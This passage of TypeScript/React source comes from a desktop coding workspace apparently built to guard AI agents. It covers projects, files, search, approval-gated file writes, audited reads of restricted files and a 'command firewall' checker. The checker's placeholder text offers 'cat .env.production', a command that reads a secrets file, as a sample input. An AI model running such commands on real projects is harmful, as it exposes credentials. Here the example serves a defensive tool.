    if (!activeSession || !messageDraft.trim() || streaming) return;
    setError(null);
    // Spec 5.1 PR3 — the legacy /api/sessions/:id/messages POST was the
    // demo-mode message-append shim, removed in the paywall migration.
    // Chat-message sends now flow through ChatPanel + chats.mutations
    // (Spec 5 PR 7). This handler is wired to a vestigial form in the
    // EditorFrame composer; we no-op-with-error here to surface the
    // migration if a user somehow reaches the legacy form.
    setError(
      "Sending messages from this composer is no longer supported. Open a Chat from the left rail to talk to an agent."
    );
    setMessageDraft("");
  }

  async function createProject(event: FormEvent<HTMLFormElement>) {
    event.preventDefault();
    if (!projectRootDraft.trim()) {
      filesStore.setState({ error: "Project root is required." });
      return;
    }
    try {
      const cleanRoot = sanitizePath(projectRootDraft);
      const project = await api.createProject({
        name: projectNameDraft.trim() || cleanRoot.split("/").filter(Boolean).at(-1) || "Project",
        rootPath: cleanRoot,
      });
      setProjectNameDraft("");
      setProjectRootDraft("");
      setProjectPanelOpen(false);
      await refreshProjectsAndActivate({
        projectId: project.id,
        rootPath: project.rootPath,
        name: project.name,
      });
      setDraftRepo(project.name || project.rootPath);
    } catch (projectError) {
      filesStore.setState({
        error: projectError instanceof Error ? projectError.message : "Could not save project",
      });
    }
  }

  async function browseProjectRootOnce() {
    if (!projectRootDraft.trim()) {
      filesStore.setState({ error: "Project root is required." });
      return;
    }
    try {
      const root = await api.validateFolder(sanitizePath(projectRootDraft));
      setProjectPanelOpen(false);
      await refreshProjectsAndActivate({
        projectId: null,
        rootPath: root.rootPath,
        name: root.displayName || root.rootPath,
      });
    } catch (openError) {
      filesStore.setState({
        error: openError instanceof Error ? openError.message : "Could not open folder",
      });
    }
  }

  // Validate a path and activate it as the file root. Shared by the rail form
  // (type a path + Enter) and the Browse… picker (pick a folder in the native
  // dialog) so both the keyboard and the mouse paths activate the folder
  // directly — matching the project/recent chips.
  async function activateRootPath(path: string) {
    const trimmed = path.trim();
    if (!trimmed) return;
    try {
      const root = await api.validateFolder(sanitizePath(trimmed));
      setRootDraft("");
      await refreshProjectsAndActivate({
        projectId: null,
        rootPath: root.rootPath,
        name: root.displayName || root.rootPath,
      });
    } catch (openError) {
      filesStore.setState({
        error: openError instanceof Error ? openError.message : "Could not open folder",
      });
    }
  }

  // Activate a typed path as the file root — fired when the user types a path
  // into the box and presses Enter (the rail form's submit). Browsing a folder
  // or clicking a project/recent chip activates it directly.
  async function openRoot(event: FormEvent<HTMLFormElement>) {
    event.preventDefault();
    await activateRootPath(rootDraft);
  }

  // "Open folder" button: reveal the active folder (the highlighted project or
  // file root) in the OS file manager (Finder on macOS, File Explorer on
  // Windows, etc.), via the Tauri opener plugin. No-op in the browser dev
  // build (not running inside Tauri).
  async function revealActiveFolderInFinder() {
    const activeProject = (files.projects || []).find(
      (project) => project.id === files.selectedProjectId
    );
    const path = activeProject?.rootPath || files.rootPath;
    if (!path) return;
    const inTauri = Boolean(
      (window as unknown as { __TAURI_INTERNALS__?: unknown }).__TAURI_INTERNALS__
    );
    if (!inTauri) return;
    try {
      await openPath(path);
    } catch (openError) {
      // Tauri IPC rejections are frequently plain strings (e.g. ACL-denial
      // messages) rather than Error instances — surface those instead of
      // swallowing them under the generic fallback.
      filesStore.setState({
        error:
          openError instanceof Error
            ? openError.message
            : typeof openError === "string"
              ? openError
              : "Could not open folder in the file manager",
      });
    }
  }

  async function refreshProjectsAndActivate(target: {
    projectId: string | null;
    rootPath: string;
    name: string;
  }) {
    const projects = await api
      .getProjects()
      .catch(() => ({ projects: files.projects, recentFolders: files.recentFolders }));
    writeSavedRoot(target);
    filesStore.setState((current) => ({
      ...current,
      projects: projects.projects,
      recentFolders: projects.recentFolders,
      rootPath: target.rootPath,
      rootName: target.name,
      selectedProjectId: target.projectId,
      error: null,
    }));
    setLeftHome(true); // opening a project is an explicit "leave Welcome" action
  }

  function activateProject(projectId: string | null, rootPath: string, name: string) {
    writeSavedRoot({ projectId, rootPath, name });
    filesStore.setState({
      rootPath,
      rootName: name,
      selectedProjectId: projectId,
      error: null,
    });
    setDraftRepo(name || rootPath);
    setLeftHome(true); // opening a project is an explicit "leave Welcome" action
  }

  async function deleteProject(projectId: string) {
    const ok = window.confirm(
      "Remove this saved project from Steerly? The files on disk are not deleted."
    );
    if (!ok) return;
    await api.deleteProject(projectId).catch((deleteError) => {
      filesStore.setState({
        error: deleteError instanceof Error ? deleteError.message : "Could not remove project",
      });
    });
    await refresh();
  }

  async function loadTree(relPath: string) {
    if (!filesStore.getSnapshot().rootPath) return;
    try {
      const current = filesStore.getSnapshot();
      const tree = await api.getFileTree({
        projectId: current.selectedProjectId || undefined,
        rootPath: current.selectedProjectId ? undefined : current.rootPath || undefined,
        path: relPath || ".",
      });
      const normalized = tree.entries.map(normalizeFileEntry);
      setTreeEntries((existing) => {
        const next = new Map(existing);
        next.set(relPath || "", normalized);
        return next;
      });
      filesStore.setState({ entries: normalized, error: null });
    } catch (treeError) {
      filesStore.setState({
        error: treeError instanceof Error ? treeError.message : "Could not load files",
      });
    }
  }

  async function toggleDirectory(path: string) {
    const next = new Set(expandedDirs);
    if (next.has(path)) {
      next.delete(path);
      setExpandedDirs(next);
      return;
    }
    next.add(path);
    setExpandedDirs(next);
    if (!treeEntries.has(path)) await loadTree(path);
  }

  async function refreshTree() {
    setTreeEntries(new Map());
    setExpandedDirs(new Set([""]));
    await loadTree("");
  }

  async function openFile(entry: FileEntry, targetLine?: number) {
    if (!activeRoot) return;
    // Web content (HTML/SVG): preview it in the inspector Browser tab as well,
    // so you can edit on the left and see it rendered on the right.
    if (isWebPreviewable(entry.path)) {
      openInBrowserPane({ path: entry.path, projectId: activeRoot.projectId });
    }
    const existing = openFiles.find(
      (file) => file.rootPath === activeRoot.rootPath && file.path === entry.path
    );
    if (existing) {
      setActivePane(existing.id);
      if (typeof targetLine === "number") patchOpenFile(existing.id, { pendingLine: targetLine });
      // Reveal the editor: dismiss the full-surface terminal overlay so the
      // file the user clicked is actually visible (not painted underneath it).
      setTerminalVisible(false);
      setLeftHome(true);
      return;
    }
    const id = `file-${Date.now()}-${openFiles.length}`;
    const tab: OpenFileTab = {
      id,
      path: entry.path,
      rootPath: activeRoot.rootPath,
      projectId: activeRoot.projectId,
      content: "",
      savedContent: "",
      status: entry.restricted ? "Restricted - reveal to load" : "Loading...",
      restricted: Boolean(entry.restricted),
      restrictedReason: entry.restrictedReason || null,
      loading: true,
      error: null,
      pendingLine: typeof targetLine === "number" ? targetLine : null,
    };
    setOpenFiles((current) => [...current, tab]);
    setActivePane(id);
    // Reveal the editor over the terminal overlay (see existing-file path above).
    setTerminalVisible(false);
    setLeftHome(true);
    if (entry.restricted) {
      const ok = window.confirm(
        `Read restricted file "${entry.path}"?\n\n${entry.restrictedReason || "This file may contain secrets."}\n\nThe read will be audited.`
      );
      if (!ok) {
        patchOpenFile(id, { loading: false, status: "Restricted - reveal cancelled" });
        return;
      }
    }
    await fetchFileIntoTab(id, tab, Boolean(entry.restricted), targetLine);
  }

  function openInBrowserPane(file: { path: string; projectId: string | null }) {
    navigateBrowser(file.path, file.projectId);
    // Browser now lives in the inspector — switch to its tab and ensure the
    // inspector is expanded so the preview is actually visible.
    setInspectorTab("browser");
    setContextCollapsed(false);
  }

  // Auto-widen the inspector while the Browser tab is active so the preview is
  // usable (the other tabs are fine in the narrow rail). Restore the prior
  // width on leaving. --col-context is clamped to MAX_RAIL (560) by the layout.
  const browserWidenedRef = useRef(false);
  const prevContextWidthRef = useRef<string>("");
  useEffect(() => {
    const shell = shellRef.current;
    if (!shell) return;
    if (inspectorTab === "browser") {
      const cur = parseFloat(getComputedStyle(shell).getPropertyValue("--col-context")) || 0;
      if (cur < 480 && !browserWidenedRef.current) {
        prevContextWidthRef.current = shell.style.getPropertyValue("--col-context");
        shell.style.setProperty("--col-context", "520px");
        browserWidenedRef.current = true;
      }
    } else if (browserWidenedRef.current) {
      if (prevContextWidthRef.current) {
        shell.style.setProperty("--col-context", prevContextWidthRef.current);
      } else {
        shell.style.removeProperty("--col-context");
      }
      browserWidenedRef.current = false;
    }
  }, [inspectorTab, shellRef]);

  useEffect(() => {
    if (!active || inspectorTab !== "browser" || contextCollapsed || maxMode !== "none") {
      void hideNative();
    }
  }, [active, contextCollapsed, inspectorTab, maxMode]);

  // Open a resolved file ref (from chat/terminal) in the editor, jumping to its
  // line. Synthesizes a minimal FileEntry; the restricted flag drives the
  // existing reveal-to-load confirm in openFile.
  function openFileByRef(ref: {
    path: string;
    line?: number;
    restricted?: boolean;
    restrictedReason?: string | null;
  }) {
    const name = ref.path.split("/").pop() || ref.path;
    void openFile(
      {
        name,
        path: ref.path,
        type: "file",
        restricted: ref.restricted,
        restrictedReason: ref.restrictedReason ?? undefined,
      },
      ref.line
    );
  }

  async function fetchFileIntoTab(
    id: string,
    tab: OpenFileTab,
    restricted: boolean,
    _targetLine?: number
  ) {
    try {
      let restrictedToken = "";
      if (restricted) {
        const approval = await api.approveRestrictedRead({
          projectId: tab.projectId,
          rootPath: tab.projectId ? null : tab.rootPath,
          path: tab.path,
        });
        restrictedToken = approval.restrictedToken;
      }
      const body = await api.readFile({
        projectId: tab.projectId,
        rootPath: tab.projectId ? null : tab.rootPath,
        path: tab.path,
        allowRestricted: restricted,
        restrictedToken,
      });
      applyFileRead(id, body);
    } catch (readError) {
      patchOpenFile(id, {
        loading: false,
        error: readError instanceof Error ? readError.message : "Read failed",
        status: "Read failed",
      });
    }
  }

  function applyFileRead(id: string, body: FileReadPayload) {
    if (body.binary || body.tooLarge) {
      patchOpenFile(id, {
        loading: false,
        status: body.binary ? "Binary file" : "File too large",
        error: body.binary
          ? "Binary files are not shown in the editor."
          : `Too large (${formatBytes(body.size || 0)})`,
      });
      return;
    }
    const content = body.content || "";
    patchOpenFile(id, {
      content,
      savedContent: content,
      restricted: Boolean(body.restricted),
      restrictedReason: body.restrictedReason,
      loading: false,
      status: `Loaded ${formatBytes(body.size || content.length)}`,
      error: null,
    });
  }

  async function saveFile(tab: OpenFileTab, approved = false, approvalToken = "") {
    try {
      patchOpenFile(tab.id, { status: "Saving...", error: null });
      const result = await api.writeFile({
        projectId: tab.projectId,
        rootPath: tab.projectId ? null : tab.rootPath,
        path: tab.path,
        content: tab.content,
        approved,
        approvalToken,
      });
      if (result.code === "APPROVAL_REQUIRED") {
        const ok = window.confirm(
          `Approval required to write ${result.path || tab.path}\n\nReason: ${result.reason || "policy-changing file"}\n\nProceed anyway?`
        );
        if (!ok) {
          patchOpenFile(tab.id, { status: "Save cancelled." });
          return;
        }
        await saveFile(tab, true, result.approvalToken || "");
        return;
      }
      patchOpenFile(tab.id, {
        savedContent: tab.content,
        status: `Saved ${formatBytes(result.bytesWritten || tab.content.length)}`,
        error: null,
      });
    } catch (saveError) {
      const data =
        saveError instanceof ApiError && saveError.data && typeof saveError.data === "object"
          ? (saveError.data as Record<string, unknown>)
          : {};
      patchOpenFile(tab.id, {
        status: "Save failed",
        error: String(
          data.error || (saveError instanceof Error ? saveError.message : "Write failed")
        ),
      });
    }
  }

  function patchOpenFile(id: string, patch: Partial<OpenFileTab>) {
    setOpenFiles((current) =>
      current.map((file) => (file.id === id ? { ...file, ...patch } : file))
    );
  }

  function closeFile(id: string) {
    const file = openFiles.find((item) => item.id === id);
    if (
      file &&
      file.content !== file.savedContent &&
      !window.confirm(`Discard unsaved changes to ${file.path}?`)
    )
      return;
    setOpenFiles((current) => current.filter((item) => item.id !== id));
    // (editor view cleanup is handled by the openFiles-sync effect above)
    setEditorWrap((prev) => {
      if (!(id in prev)) return prev;
      const { [id]: _drop, ...rest } = prev;
      return rest;
    });
    setEditorCursor((prev) => {
      if (!(id in prev)) return prev;
      const { [id]: _drop, ...rest } = prev;
      return rest;
    });
    if (activePane === id) setActivePane("chat");
  }

  // Bulk-close helpers used by the tab right-click menu. Each one accepts
  // a predicate over OpenFileTab and drops every match. We DO NOT prompt
  // for each dirty tab — that would be a confirm() storm; instead we ask
  // once at the top with a count if any dirty tabs are in the target set.
  function closeFilesMatching(label: string, predicate: (file: OpenFileTab) => boolean) {
    const targets = openFiles.filter(predicate);
    if (!targets.length) return;
    const dirty = targets.filter((file) => file.content !== file.savedContent);
    if (dirty.length) {
      const list =
        dirty
          .slice(0, 3)
          .map((file) => file.path)
          .join(", ") + (dirty.length > 3 ? ` and ${dirty.length - 3} more` : "");
      if (
        !window.confirm(
          `${label}: discard unsaved changes to ${dirty.length} file${dirty.length === 1 ? "" : "s"}?\n\n${list}`
        )
      )
        return;
    }
    const drop = new Set(targets.map((file) => file.id));
    setOpenFiles((current) => current.filter((item) => !drop.has(item.id)));
    setEditorWrap((prev) => {
      const next: typeof prev = {};
      for (const [k, v] of Object.entries(prev)) if (!drop.has(k)) next[k] = v;
      return next;
    });
    setEditorCursor((prev) => {
      const next: typeof prev = {};
      for (const [k, v] of Object.entries(prev)) if (!drop.has(k)) next[k] = v;
      return next;
    });
    if (typeof activePane === "string" && activePane !== "chat" && drop.has(activePane))
      setActivePane("chat");
  }

  function closeOtherFiles(keepId: string) {
    closeFilesMatching("Close others", (file) => file.id !== keepId);
  }

  function closeFilesToRight(anchorId: string) {
    const idx = openFiles.findIndex((file) => file.id === anchorId);
    if (idx === -1) return;
    const rightIds = new Set(openFiles.slice(idx + 1).map((file) => file.id));
    closeFilesMatching("Close to the right", (file) => rightIds.has(file.id));
  }

  function closeAllFiles() {
    closeFilesMatching("Close all", () => true);
  }

  function closeSavedFiles() {
    closeFilesMatching("Close saved", (file) => file.content === file.savedContent);
  }

  // Save every dirty, non-loading tab. Fire-and-forget — saveFile handles
  // its own status / error reporting per tab.
  async function saveAllFiles() {
    const dirty = openFiles.filter((file) => file.content !== file.savedContent && !file.loading);
    for (const file of dirty) {
      // Sequentially: the policy-engine approval dialog needs the user
      // to answer before the next save runs, otherwise stacked confirm()s
      // would queue and overwhelm the user.
      await saveFile(file);
    }
  }

  // Click handler for the editor breadcrumb. Surface the explorer, then
  // expand the tree along the path to the requested dir, loading any
  // segments we don't have cached yet. Empty path = back to root.
  async function navigateToTreePath(dir: string) {
    setSurface("explorer");
    if (!activeRoot) return;
    const segments = dir.split("/").filter(Boolean);
    const wanted = new Set([""]);
    for (let i = 0; i < segments.length; i++) {
      wanted.add(segments.slice(0, i + 1).join("/"));
    }
    setExpandedDirs((current) => {
      const next = new Set(current);
      for (const path of wanted) next.add(path);
      return next;
    });
    // Lazily load any dir we haven't fetched yet, parents first so the
    // tree expands top-down without flicker.
    const ordered = ["", ...segments.map((_, i) => segments.slice(0, i + 1).join("/"))];
    for (const path of ordered) {
      if (!treeEntries.has(path)) await loadTree(path);
    }
  }

  function openSearch(mode: SearchMode) {
    if (!activeRoot) {
      filesStore.setState({ error: "Choose a file root before searching." });
      return;
    }
    setSearchMode(mode);
    setSurface("search");
    setSearchOpen(true);
  }

  async function runSearch() {
    if (!activeRoot) return;
    setSearchLoading(true);
    try {
      setSearchPayload(
        await api.searchFiles({
          projectId: activeRoot.projectId,
          rootPath: activeRoot.projectId ? null : activeRoot.rootPath,
          type: searchMode,
          q: searchQuery,
          max: searchMode === "text" ? 200 : 50,
        })
      );
    } catch (searchError) {
      setSearchPayload({ results: [] });
      filesStore.setState({
        error: searchError instanceof Error ? searchError.message : "Search failed",
      });
    } finally {
      setSearchLoading(false);
    }
  }

  async function openSearchResult(result: FileSearchResult) {
    setSearchOpen(false);
    await openFile(
      { name: result.path.split("/").pop() || result.path, path: result.path, type: "file" },
      result.line
    );
  }

  async function addCustomAgent(event: FormEvent<HTMLFormElement>) {
    event.preventDefault();
    try {
      const created = await api.createAgent({
        name: customAgent.name.trim(),
        cmd: customAgent.cmd.trim(),
        args: splitArgs(customAgent.args),
        env: parseEnv(customAgent.env),
      });
      terminalsStore.setState((current) => ({ ...current, agents: [...current.agents, created] }));
      setCustomAgent({ name: "", cmd: "", args: "", env: "" });
    } catch (agentError) {
      terminalsStore.setState({
        error: agentError instanceof Error ? agentError.message : "Could not add agent",
      });
    }
  }

  async function removeCustomAgent(idOrName: string) {
    await api.deleteAgent(idOrName).catch((agentError) => {
      terminalsStore.setState({
        error: agentError instanceof Error ? agentError.message : "Could not remove agent",
      });
    });
    terminalsStore.setState((current) => ({
      ...current,
      agents: current.agents.filter(
        (agent) => ((agent as unknown as Record<string, unknown>).id || agent.name) !== idOrName
      ),
    }));
  }

  async function runCommandCheck(event: FormEvent<HTMLFormElement>) {
    event.preventDefault();
    if (!commandDraft.trim()) return;
    try {
      // Spec 5.1 PR 6 — convex:api.dlp.queries.commandCheck replaces
      // the legacy POST /api/command-check. Shape preserved verbatim:
      // {command, tool, filePath, decision, severity, matchedSignals,
      // reason, saferAlternative}.
      const result = (await convex.query((convexApi as any).dlp.queries.commandCheck, {
        command: commandDraft.trim(),
      })) as Record<string, unknown>;
      setCommandResult(result);
    } catch (checkError) {
      setCommandResult({
        decision: "error",
        reason: checkError instanceof Error ? checkError.message : "Command check failed",
      });
    }
  }

  async function decideApproval(approvalId: string, decision: string) {
    // Spec 5.1 PR 5 — /api/approvals/:id/decision migrated to Convex.
    // Map the legacy REST decision strings (approved/denied) to the
    // Convex enum (allowed/denied/cancelled). G75-8 / Per
    // [[feedback-spec5-pr54-64-review-patterns]] #16 — guard any
    // non-Convex id (legacy `appr-` AND UUIDs / dashed shapes). Real
    // Convex ids never contain dashes; everything else trips v.id()
    // validation.
    if (typeof approvalId !== "string" || approvalId.includes("-")) return;
    const convexDecision: "allowed" | "denied" | "cancelled" =
      decision === "approved" || decision === "allowed"
        ? "allowed"
        : decision === "cancelled"
          ? "cancelled"
          : "denied";
    try {
      await resolveApprovalMut({
        id: approvalId as never,
        decision: convexDecision,
      });
    } catch (err) {
      console.warn("[approvals] resolve failed", err);
    }
  }

  // VS Code-style toggle: clicking the active surface collapses the rail;
  // clicking any other surface (or any button while collapsed) opens the rail
  // and switches to that surface. Mirrors the right-rail collapse behavior
  // the user expects from the chevron-style inspector.
  function handleActivityClick(target: Surface) {
    // In terminal-max the session rail is collapsed by [data-max-mode="terminal"]
    // (styles.css), so a rail-surface click can't "toggle-collapse" a rail the
    // user can't even see — it must EXIT terminal-max and reveal the chosen
    // surface. Otherwise every activity button (most visibly Workspaces, whose
    // panel lives in that rail) is a silent no-op in terminal-max. (Codex P2.)
    if (maxMode === "terminal") {
      setMaxMode("none");
      setSurface(target);
      setSessionCollapsed(false);
      return;
    }
    if (surface === target && !sessionCollapsed) {
      setSessionCollapsed(true);
      return;
    }
    setSurface(target);
    if (sessionCollapsed) setSessionCollapsed(false);
  }

  return (
    <div ref={shellRef} className={shellClass} data-max-mode={maxMode}>
      <ActivityBar
        surface={surface}
        sessionCollapsed={sessionCollapsed}
        terminalActive={terminalVisible}
        sessionsBadge={sessions.items.length}
        hasUpdateBadge={Object.values(settingsState.updates?.snapshot ?? {}).some(
          (e) => e.status === "available"
        )}
        onSurfaceSelect={(s) => handleActivityClick(s as Surface)}
        // The terminal is a full-surface overlay; this button shows/hides it.
        // (maxMode-based hide is unreliable: its CSS also hides .chat-workspace,
        // which now contains the terminal itself.) Selecting a chat/file flips
        // paneVisible off; this flips it back on.
        onTerminalMax={() => {
          const next = !terminalVisible;
          setTerminalVisible(next);
          if (next) {
            setLeftHome(true);
            // Opening the terminal from chat-max: [data-max-mode="chat"] hides
            // .terminal-workspace, so the button would light up while the
            // terminal stayed display:none. Clear the chat-max so the overlay
            // is actually visible. (Codex C2.)
            if (maxMode === "chat") setMaxMode("none");
          } else if (maxMode === "terminal") {
            // Hiding a MAXIMIZED terminal via this toggle must also exit
            // terminal-max — otherwise [data-max-mode="terminal"] keeps both
            // rails collapsed over a now-blank workspace (the same defect as
            // the in-pane × / Codex C1, just reached through the activity bar,
            // which stays visible in terminal-max).
            setMaxMode("none");
          }
        }}
        onSettingsOpen={() => setSettingsOpen(true)}
        onSearchOpen={() => openSearch("files")}
      />

      <SessionRail
        surface={surface}
        onSetSessionCollapsed={setSessionCollapsed}
        activeRoot={activeRoot}
        files={{
          projects: files.projects,
          recentFolders: files.recentFolders,
          rootPath: files.rootPath,
          selectedProjectId: files.selectedProjectId,
          error: files.error,
        }}
        projectPanelOpen={projectPanelOpen}
        onSetProjectPanelOpen={setProjectPanelOpen}
        projectNameDraft={projectNameDraft}
        onSetProjectNameDraft={setProjectNameDraft}
        projectRootDraft={projectRootDraft}
        onSetProjectRootDraft={setProjectRootDraft}
        onCreateProject={createProject}
        onBrowseProjectRootOnce={browseProjectRootOnce}
        onActivateProject={activateProject}
        onDeleteProject={deleteProject}
        rootDraft={rootDraft}
        onSetRootDraft={setRootDraft}
        onOpenRoot={openRoot}
        onBrowseFolder={activateRootPath}
        onRevealInFinder={revealActiveFolderInFinder}
        treeEntries={treeEntries}
        expandedDirs={expandedDirs}
        onToggleDirectory={toggleDirectory}
        onOpenFile={openFile}
        onRefreshTree={refreshTree}
        onOpenSearch={openSearch}
        workbenchActiveId={workbenches.activeId}
        leftTab={leftTab}
        onSetLeftTab={setLeftTab}
        sessions={{ items: sessions.items, loading: sessions.loading }}
        activeSession={activeSession}
        terminals={{ agents: terminals.agents, error: terminals.error }}
        onSetActivePane={setActivePane}
        onSetChatVisible={(v) => {
          // Selecting a chat/session reveals it AND counts as leaving the
          // Welcome home screen, so closing it later doesn't bounce to Welcome.
          setChatVisible(v);
          if (v) setLeftHome(true);
        }}
        onSetTerminalVisible={setTerminalVisible}
        onSetMaxMode={setMaxMode}
        customAgentPanelOpen={customAgentPanelOpen}
        onSetCustomAgentPanelOpen={setCustomAgentPanelOpen}
        customAgent={customAgent}
        onSetCustomAgent={setCustomAgent}
        onAddCustomAgent={addCustomAgent}
        onRemoveCustomAgent={removeCustomAgent}
      />

      <div
        className="splitter splitter--session"
        data-resize="session"
        role="separator"
        aria-orientation="vertical"
        tabIndex={0}
        {...splitterProps("session")}
      />

      {isEmptyState ? (
        <WelcomeView
          recentProjects={files.projects.slice(0, 5).map((p) => ({
            id: p.id,
            name: p.name || p.rootPath,
          }))}
          onOpenProject={() => {
            setSurface("explorer");
            // The add-project form lives in the SessionRail, which is hidden
            // while the rail is collapsed (persisted via
            // agentguard-layout-session-collapsed). Without this the CTA looks
            // like a no-op for anyone who left the rail collapsed. Mirror
            // handleActivityClick, which uncollapses on every surface switch.
            setSessionCollapsed(false);
            setProjectPanelOpen(true);
          }}
          onStartChat={() => {
            setLeftHome(true);
            setLeftTab("chats");
            setChatVisible(true);
          }}
          onOpenTerminal={() => {
            // Terminal visibility is driven by paneVisible now, not maxMode —
            // setMaxMode("terminal") would no longer surface the overlay.
            setLeftHome(true);
            setTerminalVisible(true);
          }}
          onRecentClick={(id) => {
            const p = files.projects.find((x) => x.id === id);
            if (p) activateProject(p.id, p.rootPath, p.name || p.rootPath);
          }}
        />
      ) : (
        <EditorFrame
          workbenches={workbenches}
          activeSession={activeSession}
          activeRoot={activeRoot}
          maxMode={maxMode}
          onSetMaxMode={setMaxMode}
          terminalVisible={terminalVisible}
          onSetTerminalVisible={setTerminalVisible}
          chatVisible={chatVisible}
          onSetChatVisible={setChatVisible}
          activeChatId={activeChatId}
          openChats={openChats}
          onSetContextCollapsed={setContextCollapsed}
          activePane={activePane}
          onSetActivePane={setActivePane}
          openFiles={openFiles}
          error={error}
          streaming={streaming}
          draftRepo={draftRepo}
          onSetDraftRepo={setDraftRepo}
          draftAgent={draftAgent}
          onSetDraftAgent={setDraftAgent}
          draftMode={draftMode}
          onSetDraftMode={setDraftMode}
          draftGoal={draftGoal}
          onSetDraftGoal={setDraftGoal}
          messageDraft={messageDraft}
          onSetMessageDraft={setMessageDraft}
          modelOverride={modelOverride}
          onSetModelOverride={setModelOverride}
          activeChatAbort={activeChatAbort}
          editorWrap={editorWrap}
          onSetEditorWrap={setEditorWrap}
          editorCursor={editorCursor}
          onSetEditorCursor={setEditorCursor}
          cmdKOpen={cmdKOpen}
          onSetCmdKOpen={setCmdKOpen}
          activeEditorView={activeEditorView}
          onRegisterEditorView={registerEditorView}
          lastMeter={lastMeter}
          onSetLastMeter={setLastMeter}
          activeFile={activeFile}
          snapshot={snapshot}
          terminalAgents={terminals.agents}
          workbenchActiveId={workbenchesStore.getSnapshot().activeId || "wb-default"}
          onCreateSession={createSession}
          onSendMessage={sendMessage}
          onSaveFile={saveFile}
          onCloseFile={closeFile}
          onPatchOpenFile={patchOpenFile}
          filesProjects={files.projects}
          onOpenInBrowser={openInBrowserPane}
          onOpenFileRef={openFileByRef}
          fileRefCtx={{
            projectId: activeRoot?.projectId ?? null,
            rootPath: activeRoot?.projectId ? null : (activeRoot?.rootPath ?? null),
          }}
        />
      )}

      <div
        className="splitter splitter--context"
        data-resize="context"
        role="separator"
        aria-orientation="vertical"
        tabIndex={0}
        {...splitterProps("context")}
      />

      <aside className="context-rail" data-inspector-tab={inspectorTab}>
        <button
          className="rail-collapse"
          type="button"
          aria-label="Collapse inspector"
          title="Collapse inspector"
          onClick={() => setContextCollapsed(true)}
        >
          <ChevronRight />
        </button>
        <section className="context-card service-card context-rail__pinned">
          <div className="section-heading">
            <span>Runtime</span>
            <strong className="status-text">{runtimeLabel}</strong>
          </div>
        </section>

        <nav className="context-tabs" role="tablist" aria-label="Inspector tabs">
          <InspectorButton
            tab="context"
            active={inspectorTab === "context"}
            onSelect={setInspectorTab}
          >
            Context
          </InspectorButton>
          <InspectorButton
            tab="security"
            active={inspectorTab === "security"}
            onSelect={setInspectorTab}
            badge={activeChat ? chatPending.length : liveApprovals.length}
          >
            Security
          </InspectorButton>
          <InspectorButton
            tab="review"
            active={inspectorTab === "review"}
            onSelect={setInspectorTab}
          >
            Review
          </InspectorButton>
          <InspectorButton
            tab="browser"
            active={inspectorTab === "browser"}
            onSelect={setInspectorTab}
          >
            Browser
          </InspectorButton>
        </nav>

        <div
          className="context-panel"
          data-panel="context"
          data-active={inspectorTab === "context" ? "true" : undefined}
        >
          {activeChat ? (
            <ChatContextSections chat={activeChat} />
          ) : (
            <>
              <ContextCard title="Agent playbook">
                <AgentPlaybookPanel session={activeSession} />
              </ContextCard>
              <ContextCard title="Task contract">
                <TaskContractPanel session={activeSession} />
              </ContextCard>
              <ContextCard title="Context pack">
                <ContextPackPanel session={activeSession} />
              </ContextCard>
              <ContextCard title="Code context">
                <CodeContextPanel files={snapshot?.contextFiles || activeSession?.filesOpen} />
              </ContextCard>
              <ContextCard title="Security memory">
                <MemoryNotesPanel
                  notes={
                    liveMemoryNotes.length > 0
                      ? liveMemoryNotes
                      : snapshot?.memoryNotes ||
                        (activeSession?.relatedMemory as Array<Record<string, unknown>> | undefined)
                  }
                />
              </ContextCard>
            </>
          )}
        </div>

        <div
          className="context-panel"
          data-panel="security"
          data-active={inspectorTab === "security" ? "true" : undefined}
        >
          {activeChat ? (
            <ChatSecuritySections chat={activeChat} pending={chatPending} />
          ) : (
            <>
              <section className="context-card">
                <div className="section-heading">
                  <span>Command firewall</span>
                </div>
                <form className="command-check" onSubmit={runCommandCheck}>
                  <input
                    value={commandDraft}
                    onChange={(event) => setCommandDraft(event.target.value)}
                    type="text"
                    placeholder="npm test, git push, cat .env.production"
                  />
                  <button className="button secondary" type="submit">
                    Check
                  </button>
                </form>
                <div className="command-result">
                  {commandResult ? (
                    <CommandResult result={commandResult} />
                  ) : (
                    <CommandSamples session={activeSession} />
                  )}
                </div>
              </section>
              <ContextCard title="Guardrails">
                <MiniList
                  items={(snapshot?.guardrails || []).slice(0, 6)}
                  empty="No guardrails loaded."
                />
              </ContextCard>
              <ContextCard title="Approvals">
                <ApprovalList approvals={liveApprovals.slice(0, 6)} onDecision={decideApproval} />
              </ContextCard>
              <ContextCard title="Tool calls">
                <CommandList events={liveCommandAudit.slice(0, 8)} />
              </ContextCard>
            </>
          )}
        </div>

        <div
          className="context-panel"
          data-panel="review"
          data-active={inspectorTab === "review" ? "true" : undefined}
        >
          {activeChat ? (
            <ChatReviewSections chat={activeChat} />
          ) : (
            <>
              {/* key by session so the stub-message state resets when the
                  active session changes (panels stay mounted otherwise). */}
              <PrRiskCard
                items={liveRiskBriefs}
                rootPath={files.rootPath}
                analyzePr={analyzePr}
                canViewHistory={!!hasProPlan}
                onOpenTerminal={() => {
                  setLeftHome(true);
                  setTerminalVisible(true);
                }}
                key={activeSession?.id || "empty"}
              />
              <ContextCard title="Reviewer handoff">
                <ReviewerHandoffPanel session={activeSession} />
              </ContextCard>
            </>
          )}
        </div>

        <div
          className="context-panel context-panel--browser"
          data-panel="browser"
          data-active={inspectorTab === "browser" ? "true" : undefined}
        >
          {/* Mount the browser only while its tab is active — it owns an iframe
              + a live store subscription we don't want running in the
              background behind the other inspector tabs. */}
          {active && inspectorTab === "browser" && <BrowserPane />}
        </div>
      </aside>

      {searchOpen && (
        <div
          className="palette-overlay is-open"
          role="dialog"
          aria-label="Search project"
          onClick={(event) => {
            if (event.currentTarget === event.target) setSearchOpen(false);
          }}
        >
          <div className="palette-box">
            <div className="palette-head">
              <button
                className="palette-mode"
                type="button"
                onClick={() => setSearchMode((mode) => (mode === "files" ? "text" : "files"))}
              >
                {searchMode === "text" ? "Text" : "Files"}
              </button>
              <input
                className="palette-input"
                value={searchQuery}
                onChange={(event) => setSearchQuery(event.target.value)}
                autoFocus
                placeholder={
                  searchMode === "text" ? "Search file contents..." : "Search files by name..."
                }
                onKeyDown={(event) => {
                  if (event.key === "Escape") setSearchOpen(false);
                }}
              />
            </div>
            <ul className="palette-results">
              {searchLoading && <li className="palette-row palette-row--info">Searching...</li>}
              {!searchLoading && !(searchPayload?.results || []).length && (
                <li className="palette-row palette-row--info">
                  {searchQuery ? "No matches." : "Start typing to search."}
                </li>
              )}
              {!searchLoading &&
                (searchPayload?.results || []).map((result) => (
                  <li
